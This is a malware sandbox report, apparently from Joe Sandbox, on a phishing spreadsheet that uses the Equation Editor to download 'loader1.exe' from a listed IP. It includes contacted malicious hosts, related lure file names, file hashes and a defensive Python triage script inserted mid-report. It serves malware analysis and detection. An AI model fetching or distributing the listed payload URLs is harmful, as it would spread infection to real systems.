                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.sify.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://search.ebay.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://search.nifty.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.google.si/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.google.cz/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.soso.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.univision.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.ebay.it/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://busca.orange.es/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.target.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://buscador.terra.es/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.iask.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.tesco.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.interpark.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://clients5.google.com/complete/search?hl=explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://investor.msn.com/explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.espn.go.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://p.zhongsou.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://service2.bfast.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown

Contacted IPs


Public

IP               Domain                              Country        ASN    ASN Name                       Malicious
192.210.173.40   unknown                             United States  36352  AS-COLOCROSSINGUS              true
62.149.128.40    www.scuolatua.com                   Italy          31034  ARUBA-ASNIT                    true
173.255.194.134  www.anthonysavillemiddleschool.com  United States  63949  LINODE-APLinodeLLCUS           true
64.227.87.162    melodezu.com                        United States  14061  DIGITALOCEAN-ASNUS             true
184.168.131.241  envisionfordheights.com             United States  26496  AS-26496-GO-DADDY-COM-LLCUS    true
217.160.0.194    www.theshapecreator.com             Germany        8560   ONEANDONE-ASBrauerstrasse48DE  true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 452647
Start date: 22.07.2021
Start time: 17:21:57
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 20s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Swift-Payment_Details.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 10
Number of new started drivers analysed: 2
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@9/13@6/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 12.4% (good quality ratio 11.8%)
• Quality average: 73.5%
• Quality standard deviation: 26.3%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
17:23:09 | API Interceptor | 51x Sleep call for process: EQNEDT32.EXE modified
17:23:14 | API Interceptor | 35x Sleep call for process: vbc.exe modified
17:23:35 | API Interceptor | 228x Sleep call for process: wscript.exe modified
17:24:27 | API Interceptor | 1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Associated Sample Name / URL | Detection | Context
Match: 192.210.173.40
  SWIFT MESSAGE DETAILS.xlsx | malicious | 192.210.173.40/files/loader1.exe
  Ever Brilliant scan.xlsx | malicious | 192.210.173.40/files/loader2.exe
  Payment Advice.xlsx | malicious | 192.210.173.40/files/loader2.exe
  Payment_Ref_Advice.xlsx | malicious | 192.210.173.40/files/loader1.exe
  Quotation_Request_DCW.xlsx | malicious | 192.210.173.40/files/loader1.exe
  Quotation_Request_for_Customer.xlsx | malicious | 192.210.173.40/files/loader1.exe
  Documents_Details-RFQ-Information.xlsx | malicious | 192.210.173.40/files/loader1.exe
  FH_H1000_BMBH_HIGH_60290010852.xlsx | malicious | 192.210.173.40/files/loader2.exe
  Documents_Details-Shipping-Information.xlsx | malicious | 192.210.173.40/files/loader1.exe
  RemittanceAdviceNotification40097825604.xlsx | malicious | 192.210.173.40/files/loader2.exe
  SHIPMENT_INFORMATION-DocumentsInvoices.xlsx | malicious | 192.210.173.40/files/loader1.exe
  AYN0711743 - 0PFFCE1MA.xlsx | malicious | 192.210.173.40/files/loader2.exe
  VSP-88D-Neo1-F YX20210315086 KSAI21061536.xlsx | malicious | 192.210.173.40/files/loader1.exe
  PO 1032123 - 1032503.xlsx | malicious | 192.210.173.40/files/loader1.exe
  L2.xlsx | malicious | 192.210.173.40/files/loader2.exe
  Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | malicious | 192.210.173.40/files/loader1.exe
  MT103-payment confirmation.xlsx | malicious | 192.210.173.40/files/loader2.exe
  Agency Appointment for Mv TBN Port-Appointment Letter- 2100133.xlsx | malicious | 192.210.173.40/files/loader1.exe

Domains

Associated Sample Name / URL | Detection | Context
Match: www.theshapecreator.com
  TeMdJqNMM0.exe | malicious | 217.160.0.194
  4dvYb6Nq3y.exe | malicious | 217.160.0.194
Match: www.scuolatua.com
  Rq0Y7HegCd.exe | malicious | 62.149.128.40
  0FKzNO1g3P.exe | malicious | 62.149.128.40
Match: www.anthonysavillemiddleschool.com
  TeMdJqNMM0.exe | malicious | 45.33.2.79
  7VGeqwDKdb.exe | malicious | 45.79.19.196
  quote.exe | malicious | 45.56.79.23

                                                                                                                                                          ASN

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          AS-COLOCROSSINGUSPO20210722.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.245.119.43
                                                                                                                                                          USD_SLIP.docxGet hashmaliciousBrowse
                                                                                                                                                          • 198.46.132.159
                                                                                                                                                          o3ZUDIEL1vGet hashmaliciousBrowse
                                                                                                                                                          • 107.173.85.99
                                                                                                                                                          Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.81.125
                                                                                                                                                          BANKINV19072021LIMCA.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.129.35
                                                                                                                                                          aJw19xLGjcGet hashmaliciousBrowse
                                                                                                                                                          • 107.172.196.205
                                                                                                                                                          uqZ7bBFvVLGet hashmaliciousBrowse
                                                                                                                                                          • 107.172.196.205
                                                                                                                                                          9J7OaHH7ObGet hashmaliciousBrowse
                                                                                                                                                          • 107.172.196.205
                                                                                                                                                          QbdydvqPuuGet hashmaliciousBrowse
                                                                                                                                                          • 107.172.196.205
                                                                                                                                                          sphost.exeGet hashmaliciousBrowse
                                                                                                                                                          • 172.245.186.101
                                                                                                                                                          _VM_1064855583.HtMGet hashmaliciousBrowse
                                                                                                                                                          • 75.127.11.55
                                                                                                                                                          Inv-04_PDF.vbsGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.128.168
                                                                                                                                                          Dvf7OP92yJGet hashmaliciousBrowse
                                                                                                                                                          • 104.170.143.71
                                                                                                                                                          PURCHASE ORDER 72021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.81.125
                                                                                                                                                          Order Request for Quotation.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.91.134
                                                                                                                                                          Quotaton.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.81.125
                                                                                                                                                          SWIFT MESSAGE DETAILS.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40
                                                                                                                                                          PI.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.23.207.48
                                                                                                                                                          ftpp.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.46.132.159
                                                                                                                                                          swift.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.23.207.48
                                                                                                                                                          ARUBA-ASNITXlojlgo2gbGet hashmaliciousBrowse
                                                                                                                                                          • 134.255.177.23
XfKsLIPLUu (malicious)
  • 217.73.230.179
o0z4JJpYNf (malicious)
  • 212.237.36.89
soa-032119.exe (malicious)
  • 62.149.128.40
d6qU4nYIEp.exe (malicious)
  • 89.46.109.25
1Ptfo0FZUMT7hlK.exe (malicious)
  • 89.46.110.19
0VjjGsIIBB.exe (malicious)
  • 217.61.51.61
WPxoHlbMVs.exe (malicious)
  • 217.61.51.61
hiisl0XvrE.exe (malicious)
  • 217.61.51.61
cCEP3pyVp8.exe (malicious)
  • 217.61.51.61
pCCZmmulmJ.exe (malicious)
  • 217.61.51.61
Rq0Y7HegCd.exe (malicious)
  • 89.46.109.25
242jQP4mQP.exe (malicious)
  • 89.46.109.25
RblUKpEC0p.exe (malicious)
  • 89.46.107.249
N0vpYgIYpv.exe (malicious)
  • 62.149.144.60
droxoUY6SU.exe (malicious)
  • 62.149.144.56
0FKzNO1g3P.exe (malicious)
  • 62.149.128.40
28Y753mbw5.exe (malicious)
  • 80.88.87.243
7ujc2szSQX.exe (malicious)
  • 80.88.87.243
Purchase_Order.xlsx (malicious)
  • 80.88.87.243

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          No context

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):188889
                                                                                                                                                          Entropy (8bit):7.939883976403979
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:TwjHmsbeuEz5qDDOapMygfwt3AA4fce6/1DQj5U+FS8EoESO:TwjHFrtYwxAAMu/1cj51FSDdSO
                                                                                                                                                          MD5:57F3AE2842FFB5CEEA386D0B97A52818
                                                                                                                                                          SHA1:68423398D025D3CBBB944EE4C3CEA5501DF67761
                                                                                                                                                          SHA-256:A0C7B3D44A5CFCDA917FC80C099DA5AB3DE582FF7C24F1373B4BD25F88D61E52
                                                                                                                                                          SHA-512:F398186C2F5ADB9726AAC3AEAD8289ABC9288404B4B39DBABC66494A77B0160CA560CF52C9F76B15B34619F150F516A74DB96DB967F75942F3C9F325C5DA4A81
                                                                                                                                                          Malicious:true
                                                                                                                                                          Reputation:low
                                                                                                                                                          IE Cache URL:http://192.210.173.40/files/loader1.exe
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..{(dl((dl((dl(.{g()dl(.xb( dl(.{f(?dl(!..(#dl((dm(.dl(!..()dl(!..()dl(Rich(dl(........................PE..L....~.`.................6..........Z .......P....@..........................p..............................................0T..x....................................................................................P...............................text....4.......6.................. ..`.rdata..d....P.......:..............@..@.data........`.......D..............@...................................................................................................................................................................................................................................................................................................................................................................................................................
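The loader1[1].exe record above is the pivot of this report: the Equation Editor helper (EQNEDT32.EXE), not Excel and not a browser, fetched http://192.210.173.40/files/loader1.exe into the WinINet cache (Content.IE5), and what landed is a PE32 image with 7.94 bits/byte of entropy. Note that the PNG Excel drops next to it scores higher (7.97) and is benign, so entropy is only a useful signal once the file type is known. The Python below is an added example, not Joe Sandbox code: it transcribes three of the records as constructed input and applies the checks an analyst would run over such a listing (PE written by an Office process, Equation Editor download, executable in the URL cache written by a non-browser, entropy gated on file type), plus the structural MZ/e_lfanew/PE check that the preview's "MZ ... PE..L" bytes pass (the "L", 0x4C, is the low byte of the i386 machine id 0x014C). Process and cache paths are taken from the report; the rule names, process sets and the 7.0 threshold are my assumptions.

```python
"""Triage of a sandbox "Created / dropped Files" listing.

Added example, not Joe Sandbox code. The records are transcribed from the
report above; the scoring rules, process sets and thresholds are assumptions.
"""
import math
from collections import Counter
from pathlib import PureWindowsPath

EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
TIF = r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"

# Constructed input: path, writing process, libmagic type, size, entropy, source URL.
DROPPED_FILES = [
    {"path": TIF + r"\Content.IE5\ZAE7RW1P\loader1[1].exe", "process": EQNEDT,
     "file_type": "PE32 executable (GUI) Intel 80386, for MS Windows",
     "size": 188889, "entropy": 7.939883976403979,
     "url": "http://192.210.173.40/files/loader1.exe"},
    {"path": TIF + r"\Content.MSO\13285AC3.png", "process": EXCEL,
     "file_type": "PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced",
     "size": 94963, "entropy": 7.9700481154985985, "url": None},
    {"path": TIF + r"\Content.MSO\377AB00B.emf", "process": EXCEL,
     "file_type": "Windows Enhanced Metafile (EMF) image data version 0x10000",
     "size": 7608, "entropy": 5.083849804271274, "url": None},
]

# Office front ends and the Equation Editor helper that CVE-2017-11882 /
# CVE-2018-0802 payloads execute inside. None of them has a reason to write a PE.
OFFICE_PROCESSES = {"excel.exe", "winword.exe", "powerpnt.exe", "eqnedt32.exe"}
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
# WinINet cache folders: any process that calls URLDownloadToFile lands files here.
URL_CACHE_MARKERS = ("content.ie5", "inetcache")


def is_pe_type(file_type: str) -> bool:
    """libmagic description of a Windows executable or DLL."""
    return file_type.startswith(("PE32", "MS-DOS executable"))


def looks_like_pe(head: bytes) -> bool:
    """Structural check on raw bytes: MZ stub whose e_lfanew points at 'PE\\0\\0'."""
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(head[0x3C:0x40], "little")
    return head[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform); the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(rec: dict) -> list[str]:
    """Return the reasons one dropped-file record deserves an analyst's attention."""
    proc = PureWindowsPath(rec["process"]).name.lower()
    path = rec["path"].lower()
    pe = is_pe_type(rec["file_type"])
    findings = []
    if pe and proc in OFFICE_PROCESSES:
        findings.append(f"PE file written by Office process {proc}")
    if rec.get("url") and proc == "eqnedt32.exe":
        findings.append(f"Equation Editor fetched {rec['url']}")
    if pe and any(m in path for m in URL_CACHE_MARKERS) and proc not in BROWSERS:
        findings.append("executable in WinINet cache written by a non-browser "
                        "(URLDownloadToFile pattern)")
    # Entropy only means something for a PE: the compressed PNG above scores
    # higher than the packed loader, so gate on type before using the number.
    if pe and rec["entropy"] >= 7.0:
        findings.append(f"high-entropy PE ({rec['entropy']:.2f} bits/byte): likely packed")
    return findings


def suspicious(records: list[dict]) -> list[str]:
    """File names of the records that produced at least one finding, in report order."""
    return [PureWindowsPath(r["path"]).name for r in records if triage(r)]


if __name__ == "__main__":
    for rec in DROPPED_FILES:
        for finding in triage(rec):
            print(f"{PureWindowsPath(rec['path']).name}: {finding}")
```

Run as-is, only loader1[1].exe is reported, with four findings; the two images produce none. The same four rules map directly onto the Sigma detections listed in the report header (file dropped by EQNEDT32.EXE, EQNEDT32.EXE connecting to the internet), and the WinINet-cache rule is the one that survives when an attacker renames the dropped file, because the cache location is chosen by urlmon, not by the payload.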
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13285AC3.png
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):94963
                                                                                                                                                          Entropy (8bit):7.9700481154985985
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                          MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                          SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                          SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                          SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36C39151.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):62140
                                                                                                                                                          Entropy (8bit):7.529847875703774
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                          MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                          SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                          SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                          SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\377AB00B.emf
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7608
                                                                                                                                                          Entropy (8bit):5.083849804271274
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:+ScYL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5cojU+H3tWa6WdTfOYLpR8d
                                                                                                                                                          MD5:50C7BF76D4BEA600FD551E5703ABB71C
                                                                                                                                                          SHA1:7FF272F8941E094F1BB97C7DECB324A9B90250C5
                                                                                                                                                          SHA-256:4CFDABA80F95C466FD26E34FEDE809B8C80799A22D41335365E5CB919E6A2A8D
                                                                                                                                                          SHA-512:3329723D2C78EE0902966A243A4EC8BC6D24B9B342AA0E4FCF76F9575A517E2E142271B82F4E3B8A39ED558B662FEE4FA6BC78A7E0A24F3B71E5F1E82E147AB3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....K.d...................T.7...7....p....\...T.7.....T.7...7....p....T.7..6Pv...p....`..p.6..$y.v8J....W.....x.7....v....$.....#.d.........7..^.p.....^.p.F..8J...pz...W.-.....7..<.v................<.>v.Z.v....X..o.....6.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69EB80DC.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):85020
                                                                                                                                                          Entropy (8bit):7.2472785111025875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                          MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80257087.png
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):94963
                                                                                                                                                          Entropy (8bit):7.9700481154985985
                                                                                                                                                          Encrypted:false
